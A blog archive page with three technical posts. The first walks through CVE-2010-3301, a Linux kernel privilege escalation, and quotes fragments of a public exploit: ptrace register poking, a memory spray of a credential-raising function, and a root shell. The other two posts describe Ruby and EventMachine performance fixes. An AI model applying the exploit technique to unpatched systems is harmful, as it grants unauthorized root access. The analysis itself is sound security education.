time to bleed by Joe Damato

technical ramblings from a wanna-be unix dinosaur

Archive for the ‘bugfix’ tag

detailed explanation of a recent privilege escalation bug in linux (CVE-2010-3301)

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. I’ll explain what the deal is from the kernel side and the exploit side.

This article is long and technical; prepare yourself.

ia32 syscall emulation

There are two ways to invoke system calls on the Intel/AMD family of processors:

  1. Software interrupt 0x80.
  2. The sysenter family of instructions.

The sysenter family of instructions is a faster syscall interface than the traditional int 0x80 interface, but it isn’t available on some older 32-bit Intel CPUs.

The Linux kernel has a layer of code to allow syscalls executed via int 0x80 to work on newer kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass off execution to the desired system call, thus maintaining support for this older system call interface.

This code can be found at http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L380. We will examine this code much more closely very soon.

ptrace(2) and the ia32 syscall emulation layer

From the ptrace(2) man page (emphasis mine):

The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.

If we examine the IA32 syscall emulation code we see some code in place to support ptrace [1]:

ENTRY(ia32_syscall)
/* . . . */
        GET_THREAD_INFO(%r10)
          orl $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.

Let’s take a look [2]:

ia32_tracesys:
        /* . . . */
        call syscall_trace_enter
        LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call
END(ia32_syscall)

Notice the LOAD_ARGS32 macro and the comment next to it. That macro reloads register values from the stack after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the saved registers that were loaded with data to invoke the desired system call. Reloading them from the stack ensures that the system call is invoked with the values the tracer left behind.

Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax

This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.

Let’s take a look at the LOAD_ARGS32 macro [3]:

.macro LOAD_ARGS32 offset, _r9=0
/* . . . */
movl \offset+40(%rsp),%ecx
movl \offset+48(%rsp),%edx
movl \offset+56(%rsp),%esi
movl \offset+64(%rsp),%edi
.endm

Notice that the register %eax is left untouched by this macro, even after the ptrace parent process has had a chance to modify its contents.

Let’s take a look at ia32_do_call, which actually transfers execution to the system call [4]:

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8) # xxx: rip relative

The system call invocation code calls the function whose address is stored in the %rax-th entry of ia32_sys_call_table. Each entry is an 8-byte pointer, so the address is read from ia32_sys_call_table + 8 * %rax.

subtle bug leads to sexy exploit

This bug was originally discovered by the Polish hacker “cliph” in 2007, fixed, but then reintroduced accidentally in early 2008.

The exploit is made possible by three key things:

  1. The register %eax is not touched in the LOAD_ARGS32 macro and can be set to any arbitrary value by a call to ptrace.
  2. The ia32_do_call code uses %rax, not %eax, when indexing into the ia32_sys_call_table.
  3. The %eax check (cmpl $(IA32_NR_syscalls-1),%eax) in ia32_tracesys only checks %eax. Any bits in the upper 32 bits of %rax will be ignored by this check.

These three stars align and allow an attacker to cause an integer overflow in ia32_do_call, causing the kernel to hand off execution to an arbitrary address.
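To make the mismatch between the check and the call concrete, here is a minimal userland C sketch of the two comparisons. It is not kernel code: FAKE_NR_SYSCALLS is a made-up stand-in for IA32_NR_syscalls (the real value depends on the kernel version), and the function names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical stand-in for IA32_NR_syscalls; the real value depends on the kernel. */
#define FAKE_NR_SYSCALLS 338u

/* Models `cmpl $(IA32_NR_syscalls-1),%eax`: only the low 32 bits of rax are compared. */
bool passes_32bit_check(uint64_t rax)
{
    uint32_t eax = (uint32_t)rax;   /* the upper 32 bits are silently dropped */
    return eax <= FAKE_NR_SYSCALLS - 1;
}

/* Models a comparison against the full 64-bit register. */
bool passes_64bit_check(uint64_t rax)
{
    return rax <= (uint64_t)(FAKE_NR_SYSCALLS - 1);
}

/* The value the tracer pokes into rax: the low half looks like syscall 0x101. */
void demo_truncated_check(void)
{
    uint64_t poked = 0x800000101ULL;

    assert(passes_32bit_check(poked));    /* slips past the 32-bit check */
    assert(!passes_64bit_check(poked));   /* a full-width check would reject it */
}
```

Calling demo_truncated_check() from a main function exercises both cases: the same value is accepted when only %eax is examined and rejected when all of %rax is.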

Damnnnnn, that’s hot.

the exploit, step by step

The exploit code is available here and was written by Ben Hawkes and others.

The exploit begins execution by forking and executing two copies of itself:

        if ( (pid = fork()) == 0) {
                ptrace(PTRACE_TRACEME, 0, 0, 0);
                execl(argv[0], argv[0], "2", "3", "4", NULL);
                perror("exec fault");
                exit(1);
        }

The child process asks to be traced by calling ptrace with PTRACE_TRACEME.

The parent process enters a loop:

        for (;;) {
                if (wait(&status) != pid)
                        continue;

                /* ... */

                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                if (rax == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set = 1;
                }

                /* ... */

                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
         }

The parent calls wait and blocks until the child enters a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow, as we’ll see shortly. ptrace is then invoked to resume execution in the child.

While this is happening, the child process is executing. It begins by looking up the addresses of two symbols in the kernel:

	commit_creds = (_commit_creds) get_symbol("commit_creds");
	/* ... */

	prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
       /* ... */

Next, the child process attempts to create an anonymous memory mapping using mmap:

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
          /* ... */

This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).

This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).
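The wrap-around is easy to check by hand or with a few lines of C. The sketch below redoes the arithmetic with the base and index values quoted above; the function names are hypothetical and the 4 KiB page size is an assumption about the target machine.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: 4 KiB pages, the usual size on x86_64. */
#define PAGE_SIZE_ASSUMED 4096ULL

/* Address read by `call *table(,%rax,8)`: base + rax * 8, modulo 2^64. */
uint64_t table_slot_address(uint64_t table_base, uint64_t rax)
{
    return table_base + rax * 8;   /* unsigned 64-bit arithmetic wraps around */
}

/* Round an address down to the start of its page, as a fixed mapping needs. */
uint64_t page_align_down(uint64_t addr)
{
    return addr & ~(PAGE_SIZE_ASSUMED - 1);
}

void demo_wraparound(void)
{
    uint64_t slot = table_slot_address(0xffffffff80000000ULL, 0x800000101ULL);

    assert(slot == 0x3f80000808ULL);                    /* wrapped into userland */
    assert(page_align_down(slot) == 0x3f80000000ULL);   /* where the mapping starts */
}
```

The sum exceeds 64 bits, so the carry is discarded and the result lands at a low address that an unprivileged process is allowed to map.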

Next, the child process writes the address of a function called kernelmodecode which makes use of the symbols commit_creds and prepare_kernel_cred which were looked up earlier:

int kernelmodecode(void *file, void *vma)
{
	commit_creds(prepare_kernel_cred(0));
	return -1;
}

The address of that function is written over and over to the 64mb memory that was mapped in:

        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;
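The reason for filling the whole mapping is that any 8-byte slot the kernel happens to read then holds the same function address. Here is a harmless userland sketch of that idea; it uses malloc instead of mmap, and marker_handler, spray, call_slot and demo_spray are hypothetical names, not part of the exploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

typedef int (*handler_fn)(void);

/* Hypothetical payload; stands in for kernelmodecode. */
int marker_handler(void)
{
    return 42;
}

/* Write the function's address into every 8-byte slot of the buffer. */
void spray(uint64_t *buf, size_t nslots, handler_fn fn)
{
    for (size_t i = 0; i < nslots; i++)
        buf[i] = (uint64_t)(uintptr_t)fn;
}

/* Dispatch through one slot, like an indirect call through a table entry. */
int call_slot(const uint64_t *buf, size_t idx)
{
    handler_fn fn = (handler_fn)(uintptr_t)buf[idx];
    return fn();
}

/* Returns the payload's result for an arbitrary slot, or -1 if allocation fails. */
int demo_spray(size_t nslots, size_t idx)
{
    assert(idx < nslots);

    uint64_t *buf = malloc(nslots * sizeof *buf);
    if (buf == NULL)
        return -1;

    spray(buf, nslots, marker_handler);
    int result = call_slot(buf, idx);
    free(buf);
    return result;
}
```

Whichever index is chosen, the call ends up in the same function, which is why the exploit does not need to hit one exact address.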

Finally, the child process executes syscall number 0x101 and then executes a shell after the system call returns:

        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");

        /* . . . */
        execl("/bin/sh", "bin/sh", NULL);

tying it all together

When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow: 0x800000101 and resumes execution in the child.

The child executes the erroneous check described above:

        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call

Which succeeds, because it is only comparing the lower 32bits of rax (0x101) to IA32_NR_syscalls-1.

Next, execution continues to ia32_do_call, which causes an overflow, since rax contains a very large value.

call *ia32_sys_call_table(,%rax,8)

Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.

kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode, setting the privileges of the process to those of init.

The system has been rooted.

The fix

The fix is to zero the upper half of rax and change the comparison to examine the entire register. You can see the diffs of the fix here and here.

Conclusions

  • Reading exploit code is fun. Sometimes you find particularly sexy exploits like this one.
  • The IA32 syscall emulation layer is, in general, pretty wild. I would not be surprised if more bugs are discovered in this section of the kernel.
  • Code reviews play a really important part of overall security for the Linux kernel, but subtle bugs like this are very difficult to catch via code review.
  • I'm not a Ruby programmer.

References

  1. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L424
  2. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L439
  3. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L50
  4. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L430

Written by Joe Damato

September 27th, 2010 at 4:59 am

Debugging Ruby: Understanding and Troubleshooting the VM and your Application

Download the PDF here.

Debugging Ruby

Written by Aman Gupta

December 2nd, 2009 at 8:30 pm

Ruby Hoedown Slides

Below are the slides for a talk that Aman Gupta and I gave at Ruby Hoedown

Download the PDF here

Thanks for reading and don’t forget to subscribe (via RSS or e-mail) and follow me on twitter.

Written by Joe Damato

August 29th, 2009 at 1:05 am

Fix a bug in Ruby’s configure.in and get a ~30% performance boost.

Special thanks…

Going out to Jake Douglas for pushing the initial investigation and getting the ball rolling.

The whole --enable-pthread thing

Ask any Ruby hacker how to easily increase performance in a threaded Ruby application and they’ll probably tell you:

Yo dude… Everyone knows you need to configure Ruby with --disable-pthread.

And it’s true; configure Ruby with --disable-pthread and you get a ~30% performance boost. But… why?

For this, we’ll have to turn to our handy tool strace. We’ll also need a simple Ruby program to test this. How about something like this:

def make_thread
  Thread.new {
    a = []
    10_000_000.times {
      a << "a"
      a.pop
    }
  }
end

t = make_thread
t1 = make_thread 

t.join
t1.join

Now, let's run strace on a version of Ruby configure'd with --enable-pthread and point it at our test script. The output from strace looks like this:

22:46:16.706136 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706177 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706218 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706259 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000005>
22:46:16.706301 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706342 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706383 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706425 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706466 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>

Pages and pages and pages of sigprocmask system calls (actually, running with strace -c, I get about 20,054,180 calls to sigprocmask, WOW). Running the same test script against a Ruby built with --disable-pthread produces output without pages and pages of sigprocmask calls (only 3 calls, a HUGE reduction).

OK, so let's just set a breakpoint in GDB... right?

OK, so we should just be able to set a breakpoint on sigprocmask and figure out who is calling it.

Well, not exactly. You can try it, but the breakpoint won't trigger (we'll see why a little bit later).

Hrm, that kinda sucks and is confusing. This will make it harder to track down who is calling sigprocmask in the threaded case.

Well, we know that when you run configure the script creates a config.h with a bunch of defines that Ruby uses to decide which functions to use for what. So let's compare ./configure --enable-pthread with ./configure --disable-pthread:

[joe@mawu:/home/joe/ruby]% diff config.h config.h.pthread
> #define _REENTRANT 1
> #define _THREAD_SAFE 1
> #define HAVE_LIBPTHREAD 1
> #define HAVE_NANOSLEEP 1
> #define HAVE_GETCONTEXT 1
> #define HAVE_SETCONTEXT 1


OK, now if we grep the Ruby source code, we see that whenever HAVE_[SG]ETCONTEXT are set, Ruby uses the library functions setcontext() and getcontext() to save and restore state for context switching and for exception handling (via the EXEC_TAG).

What about when HAVE_[SG]ETCONTEXT are not define'd? Well in that case, Ruby uses _setjmp/_longjmp.

Bingo!

That's what's going on! From the _setjmp/_longjmp man page:

... The _longjmp() and _setjmp() functions shall be equivalent to longjmp() and setjmp(), respectively, with the additional restriction that _longjmp() and _setjmp() shall not manipulate the signal mask...

And from the [sg]etcontext man page:

... uc_sigmask is the set of signals blocked in this context (see sigprocmask(2)) ...


The issue is that getcontext calls sigprocmask on every invocation but _setjmp does not.
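You can see the signal mask being captured without strace. The following is a minimal sketch, assuming glibc on Linux (where getcontext is available and fills in uc_sigmask); the function name is hypothetical. It blocks SIGUSR1, calls getcontext, and checks whether the saved context recorded that signal as blocked.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <signal.h>
#include <stddef.h>
#include <ucontext.h>

/*
 * Returns 1 if getcontext() recorded SIGUSR1 as blocked in uc_sigmask,
 * 0 if it did not, and -1 if one of the calls failed.
 */
int getcontext_captures_mask(void)
{
    sigset_t block, old;
    ucontext_t uc;

    sigemptyset(&block);
    sigaddset(&block, SIGUSR1);
    if (sigprocmask(SIG_BLOCK, &block, &old) != 0)
        return -1;

    /* getcontext has to ask the kernel for the current mask to fill uc_sigmask. */
    if (getcontext(&uc) != 0) {
        sigprocmask(SIG_SETMASK, &old, NULL);
        return -1;
    }
    int saved = sigismember(&uc.uc_sigmask, SIGUSR1);

    /* Put the original mask back so the caller is unaffected. */
    sigprocmask(SIG_SETMASK, &old, NULL);
    return saved;
}

void demo_getcontext_mask(void)
{
    int saved = getcontext_captures_mask();

    assert(saved == 1);
    (void)saved;
}
```

Saving the mask is what costs a system call each time; _setjmp skips that step entirely, which is the whole difference the strace output is showing.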

BUT WAIT if that's true why didn't GDB hit a sigprocmask breakpoint before?

x86_64 assembly FTW, again

Let's fire up gdb and figure out this breakpoint-not-breaking thing. First, let's start by disassembling getcontext (snipped for brevity):

(gdb) p getcontext
$1 = {<text variable, no debug info>} 0x7ffff7825100 <getcontext>
(gdb) disas getcontext
...
0x00007ffff782517f <getcontext+127>: mov $0xe,%rax
0x00007ffff7825186 <getcontext+134>: syscall
...
...

Yeah, that's pretty weird. I'll explain why in a minute, but let's look at the disassembly of sigprocmask first:

(gdb) p sigprocmask
$2 = {<text variable, no debug info>} 0x7ffff7817340 <__sigprocmask>
(gdb) disas sigprocmask
...
0x00007ffff7817383 <__sigprocmask+67>: mov $0xe,%rax
0x00007ffff7817388 <__sigprocmask+72>: syscall
...

Yeah, this is a bit confusing, but here's the deal.

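Recent Linux kernels support a shiny newer method for making system calls: dedicated fast system call instructions (sysenter/sysexit on 32-bit Intel, and syscall/sysret on x86_64, which is what shows up in the disassembly above). This new way was created because the old way (int $0x80) turned out to be pretty slow, so the CPU vendors created some new instructions to execute system calls without such huge overhead.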

All you need to know right now (I'll try to blog more about this in the future) is that the %rax register holds the system call number. The syscall instruction transfers control to the kernel and the kernel figures out which syscall you wanted by checking the value in %rax. Let's just make sure that sigprocmask is actually 0xe:

[joe@pluto:/usr/include]% grep -Hrn "sigprocmask" asm-x86_64/unistd.h
asm-x86_64/unistd.h:44:#define __NR_rt_sigprocmask                     14


Bingo. It's calling sigprocmask (albeit a bit obscurely).

OK, so getcontext isn't calling sigprocmask directly, instead it replicates a bunch of code that sigprocmask has in its function body. That's why we didn't hit the sigprocmask breakpoint; GDB was going to break if you landed on the address 0x7ffff7817340 but you didn't.

Instead, getcontext reimplements the wrapper code for sigprocmask itself and GDB is none the wiser.
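Here is a small sketch of the same trick in C, assuming Linux with glibc: it issues rt_sigprocmask through the generic syscall(2) wrapper, so the sigprocmask symbol is never entered and a breakpoint on it would stay silent. The helper names are hypothetical, and the sigset size of 8 bytes is an assumption that holds on x86_64 (it is the last argument in the strace output above).

```c
#define _GNU_SOURCE
#include <assert.h>
#include <signal.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Assumption: the kernel's signal set is 8 bytes, as on x86_64. */
#define KERNEL_SIGSET_BYTES 8

/*
 * Ask the kernel for the current signal mask without going through the
 * libc sigprocmask() function. Mirrors rt_sigprocmask(SIG_BLOCK, NULL, [], 8).
 */
long raw_query_sigmask(uint64_t *mask_out)
{
    return syscall(SYS_rt_sigprocmask, SIG_BLOCK, NULL, mask_out,
                   KERNEL_SIGSET_BYTES);
}

/* Returns 1 if the raw system call succeeded, 0 otherwise. */
int raw_sigprocmask_works(void)
{
    uint64_t mask = 0;

    return raw_query_sigmask(&mask) == 0;
}

void demo_raw_sigprocmask(void)
{
    int ok = raw_sigprocmask_works();

    assert(ok == 1);
    (void)ok;
}
```

Running a program that calls demo_raw_sigprocmask() under strace should show an rt_sigprocmask line just like the ones above, while a GDB breakpoint on sigprocmask is never hit.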

Mystery solved.

The patch

Get it HERE

The patch works by adding a new configure flag called --disable-ucontext that lets you specifically disable the use of [sg]etcontext. You use it in conjunction with --enable-pthread, like this:

./configure --disable-ucontext --enable-pthread


After you build Ruby configured like that, its performance is on par with (and sometimes slightly faster than) Ruby built with --disable-pthread, for about a 30% performance boost when compared to --enable-pthread.

I added the switch because I wanted to preserve the original Ruby behavior. If you just pass --enable-pthread without --disable-ucontext, Ruby will do the old thing and generate piles of sigprocmasks.

Conclusion

  1. Things aren't always what they seem - GDB may lie to you. Be careful.
  2. Use the source, Luke. Libraries can do unexpected things; debug builds of libc can help!
  3. I know I keep saying this, but assembly is useful. Start learning it today!

If you enjoyed this blog post, consider subscribing (via RSS) or following (via twitter).

You'll want to stay tuned; tmm1 and I have been on a roll the past week. Lots of cool stuff coming out!

Written by Joe Damato

May 5th, 2009 at 3:20 am

6 Line EventMachine Bugfix = 2x faster GC, +1300% requests/sec

Nothing is possible without lunch

So Aman Gupta (tmm1) and I were eating lunch at the Oaxacan Kitchen on Tuesday and as usual, we were talking about scaling Ruby. We got into a small debate about which phase of garbage collection took the most CPU time.

Aman’s claim:

  • The mark phase, specifically the stack marking phase because of the huge stack frames created by rb_eval

My claim:

  • The sweep phase, because every single object has to be touched and some freeing happens.

I told Aman that I didn’t believe the stack frames were that large, and we bet on how big we thought they would be. Couldn’t be more than a couple kilobytes, could it? Little did we know how wrong our estimates were.

Quick note about Ruby’s GC

Ruby MRI has a mark-and-sweep garbage collector. As part of the mark phase, it scans the process stack. This is required because a pointer to a Ruby object can be passed to a C extension (like EventMachine, or Hpricot, or whatever). If that happens, it isn’t safe to free the object yet. So Ruby does a simple scan and checks if each word on the stack is a pointer to the Ruby heap; if so, that item cannot be freed.
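The scan described above is cheap per word but grows linearly with the size of the stack. Here is a rough C sketch of the idea. It is not Ruby's actual implementation: the function names are hypothetical, and the heap is modeled as a single address range for simplicity.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Conservative scan: treat every word as a possible pointer and count the
 * ones that fall inside the (simplified, single-range) heap.
 */
size_t count_heap_pointers(const uintptr_t *words, size_t nwords,
                           uintptr_t heap_lo, uintptr_t heap_hi)
{
    size_t hits = 0;

    for (size_t i = 0; i < nwords; i++) {
        if (words[i] >= heap_lo && words[i] < heap_hi)
            hits++;   /* looks like a heap pointer, so the object must be kept */
    }
    return hits;
}

/* Number of words the collector has to look at for a stack of this size. */
size_t words_to_scan(size_t stack_bytes)
{
    return stack_bytes / sizeof(uintptr_t);
}

void demo_conservative_scan(void)
{
    /* A fake "stack" holding two values inside the fake heap [0x2000, 0x3000). */
    const uintptr_t fake_stack[] = { 0x10, 0x2000, 0x2ff8, 0x3000 };
    size_t hits = count_heap_pointers(fake_stack, 4, 0x2000, 0x3000);

    assert(hits == 2);
    (void)hits;
}
```

Every word costs a comparison whether or not it is a real pointer, so a stack that is hundreds of kilobytes deep means a lot of wasted work on each GC run.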

GDB to the rescue

We get back from lunch, launch our application, attach GDB and set a breakpoint. The breakpoint gets triggered and we see this seemingly innocuous stack trace [Note: To help with debugging, we compiled the EventMachine gem with -fno-omit-frame-pointer]:

#0 0x00007ffff77629ac in epoll_wait () from /lib/libc.so.6
#1 0x00007ffff6c0b220 in EventMachine_t::_RunEpollOnce (this=0x158d7e0) at em.cpp:461
#2 0x00007ffff6c0b86c in EventMachine_t::_RunOnce (this=0x158d7e0) at em.cpp:423
#3 0x00007ffff6c0bbd6 in EventMachine_t::Run (this=0x158d7e0) at em.cpp:404
#4 0x00007ffff6c06638 in evma_run_machine () at cmain.cpp:83
#5 0x00007ffff6c1897f in t_run_machine_without_threads (self=26066936) at rubymain.cpp:154
#6 0x000000000041d598 in call_cfunc (func=0x7ffff6c1896e , recv=26066936, len=0, argc=0, argv=0x0) at eval.c:5759
#7 0x000000000041c92f in rb_call0 (klass=26065816, recv=26066936, id=29417, oid=29417, argc=0, argv=0x0, body=0x18dba10, flags=0) at eval.c:5911
#8 0x000000000041e0ad in rb_call (klass=26065816, recv=26066936, mid=29417, argc=0, argv=0x0, scope=2, self=26066936) at eval.c:6158
#9 0x00000000004160d5 in rb_eval (self=26066936, n=0x1940330) at eval.c:3514
#10 0x00000000004150b7 in rb_eval (self=26066936, n=0x1941018) at eval.c:3357
#11 0x000000000041d196 in rb_call0 (klass=26065816, recv=26066936, id=5393, oid=5393, argc=0, argv=0x0, body=0x1941018, flags=0) at eval.c:6062
#12 0x000000000041e0ad in rb_call (klass=26065816, recv=26066936, mid=5393, argc=0, argv=0x0, scope=0, self=47127864) at eval.c:6158
#13 0x0000000000415d01 in rb_eval (self=47127864, n=0x2cf5298) at eval.c:3493
#14 0x00000000004148b2 in rb_eval (self=47127864, n=0x2cf4380) at eval.c:3223
#15 0x000000000041d196 in rb_call0 (klass=47127808, recv=47127864, id=5313, oid=5313, argc=0, argv=0x0, body=0x2cf4380, flags=0) at eval.c:6062
#16 0x000000000041e0ad in rb_call (klass=47127808, recv=47127864, mid=5313, argc=0, argv=0x0, scope=0, self=9606072) at eval.c:6158
#17 0x0000000000415d01 in rb_eval (self=9606072, n=0x194b2a0) at eval.c:3493
#18 0x00000000004148b2 in rb_eval (self=9606072, n=0x19587b0) at eval.c:3223
#19 0x000000000041072c in eval_node (self=9606072, node=0x19587b0) at eval.c:1437
#20 0x0000000000410dff in ruby_exec_internal () at eval.c:1642
#21 0x0000000000410e4f in ruby_exec () at eval.c:1662
#22 0x0000000000410e72 in ruby_run () at eval.c:1672
#23 0x000000000040e78a in main (argc=3, argv=0x7fffffffebd8, envp=0x7fffffffebf8) at main.c:48

Looks pretty normal, nothing to worry about, right?

We started checking the rb_eval frames because we assumed that those would be the largest stack frames. The rb_eval function inlines other functions and calls itself recursively. So how big is one of the rb_eval frames?

(gdb) frame 10
#10 0x00000000004150b7 in rb_eval (self=26066936, n=0x1941018) at eval.c:3357
3357 result = rb_eval(self, node->nd_head);
(gdb) p $rbp-$rsp
$2 = 1904

1,904 bytes – pretty large. If all 24 stack frames are that large, we are looking at around 45,700 bytes (24 × 1,904 = 45,696). Pretty serious. Let’s verify that Ruby thinks the stack is a sane size. There is a global in the Ruby interpreter called rb_gc_stack_start. It gets set when the Ruby stack is created in Init_stack(). When Ruby calculates the stack size it subtracts the current stack pointer from rb_gc_stack_start [remember on x86_64, the stack grows from high addresses to low addresses]. Let’s do that and see how big Ruby thinks the stack is.

(gdb) p (unsigned int)rb_gc_stack_start - (unsigned int)$rsp
$3 = 802688

Wait, wait, wait. 802,688 bytes with only 24 stack frames? WTF?! Something is wrong. We started at the top and checked all the rb_eval stack frames, but none of them are larger than 2kb. We did find something quite a bit larger than 2kb, though.

(gdb) frame 1
#1 0x00007ffff6c0b220 in EventMachine_t::_RunEpollOnce (this=0x158d7e0) at em.cpp:461
461 s = epoll_wait (epfd, ev, MaxEpollDescriptors, timeout == 0 ? 5 : timeout);
(gdb) p $rbp-$rsp
$28 = 786816

Uh, the RunEpollOnce stack frame is 786,816 bytes? That’s got to be wrong. WTF?

Time to bring out the big guns.

objdump + x86_64 asm FTW

I pumped EventMachine’s shared object into objdump and captured the assembly dump:

objdump -d rubyeventmachine.so > em.S

I headed down to the RunEpollOnce function and saw the following:

2f12b: 48 81 ec 78 01 0c 00 sub $0xc0178,%rsp

Interesting. So the code is moving %rsp down by 786,808 bytes to make room for something big. So, let’s see if the EventMachine code matches up with the assembly output.

struct epoll_event ev [MaxEpollDescriptors];

Where MaxEpollDescriptors = 64*1024 and sizeof(struct epoll_event) == 12. That is 64 × 1,024 × 12 = 786,432 bytes for the array alone, which matches up with the assembly dump and the GDB output.
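The numbers can be double-checked with a short C sketch. To keep it independent of the platform headers, it uses a hypothetical packed struct, fake_epoll_event, that mimics the 12-byte layout quoted above (the packed attribute assumes GCC or Clang); the constant and function names are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mimic of the 12-byte struct epoll_event layout on x86_64. */
struct __attribute__((packed)) fake_epoll_event {
    uint32_t events;
    uint64_t data;
};

/* Same value as MaxEpollDescriptors in the text above. */
enum { FAKE_MAX_EPOLL_DESCRIPTORS = 64 * 1024 };

/* Bytes needed for the on-stack array of events. */
size_t ev_array_bytes(void)
{
    return sizeof(struct fake_epoll_event) * FAKE_MAX_EPOLL_DESCRIPTORS;
}

/* Bytes of the frame adjustment that the array does not account for. */
size_t other_frame_bytes(size_t frame_adjust)
{
    return frame_adjust - ev_array_bytes();
}

void demo_frame_size(void)
{
    assert(sizeof(struct fake_epoll_event) == 12);
    assert(ev_array_bytes() == 786432);
    /* 0xc0178 is the immediate from the `sub $0xc0178,%rsp` instruction. */
    assert(other_frame_bytes(0xc0178) == 376);
}
```

So the array alone explains all but 376 bytes of the 786,808 bytes that the function reserves on the stack.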

Doing something like that in C/C++ is usually OK. Avoiding the heap whenever you can is a good idea because you avoid heap-lock contention, fragmenting the heap, and memory overhead for tracking the memory region. When writing Ruby extensions, this isn’t necessarily true. Remember, Ruby’s GC algorithm scans the entire process stack searching for references to Ruby objects. This EventMachine code causes Ruby to search an extra ~800,000 bytes, drastically slowing down garbage collection.

The patch

Get the patch HERE

The patch simply moves the stack allocated struct epoll_event ev to the class definition so that it is allocated on the heap when an instance of the class is created with new. This does not change the memory usage of the process at all. It just moves the object off the stack. This makes all the difference because Ruby’s GC scans the process stack and not the process heap.

On top of all that, this patch helps with Ruby’s green threads, too. If the epoll_wait causes a Ruby event to fire and that event creates a Ruby thread, that Ruby thread gets an entire copy of the existing stack. Each time that thread is switched into and out of, that thread stack has to be memcpy’d into and out of place. Reducing those memcpys by ~800,000 bytes is a HUGE performance win. Want to learn more about threading implementations? Check out my threading models post: here.

Fixing this turned out to be pretty simple. A six (6!!) line patch:

  • Speeds up GC by 2-3x because of the huge decrease in stack frame size.
  • Fixes an open bug in EventMachine where using threads with Epoll causes lots of slowness. The reason is that each thread will inherit an ~800,000 byte stack that gets copied in and out every context switch.
  • This results in an increase from 500 requests/sec to 7000 requests/sec when using Sinatra+Thin+Epoll+Threads. That is pretty ill.

Conclusion

All in all, a productive debugging session lasting about an hour. The result was a simple patch, with 2 big performance improvements.

A couple things to take away from this experience:

  • Spend time learning your debugging tools because it pays off, especially nm, objdump, and of course GDB.
  • Getting familiar with x86_64 assembly is crucial if you hope to debug complex software and optimize it correctly.

Keep your eyes open for upcoming blog posts about x86_64 assembly! Don’t forget to subscribe via RSS or follow me on twitter.

Written by Joe Damato

April 29th, 2009 at 1:36 am